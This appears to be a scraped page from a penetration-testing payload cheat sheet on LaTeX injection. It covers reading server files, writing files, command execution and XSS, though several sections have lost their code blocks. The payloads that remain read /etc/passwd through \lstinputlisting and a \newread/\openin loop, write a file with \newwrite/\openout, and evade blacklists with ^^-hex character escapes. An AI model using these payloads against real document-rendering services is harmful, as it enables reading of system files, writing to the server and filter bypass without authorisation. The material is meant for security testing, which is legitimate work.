LaTex Injection
You might need to adjust injection with wrappers as \[
or $
.
Read file
Read file and interpret the LaTeX code in it:
Read single lined file:
Read multiple lined file:
\lstinputlisting{/etc/passwd}
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
Read text file, without interpreting the content, it will only paste raw file content:
If injection point is past document header (\usepackage
cannot be used), some control
characters can be deactivated in order to use \input
on file containing $
, #
,
_
, &
, null bytes, ... (eg. perl scripts).
To bypass a blacklist try to replace one character with it's unicode hex value. - ^^41 represents a capital A - ^^7e represents a tilde (~) note that the āeā must be lower case
Write file
Write single lined file:
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\write\outfile{Line 2}
\write\outfile{I like trains}
\closeout\outfile
Command execution
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput
):
Cross Site Scripting
From @EdOverflow
in mathjax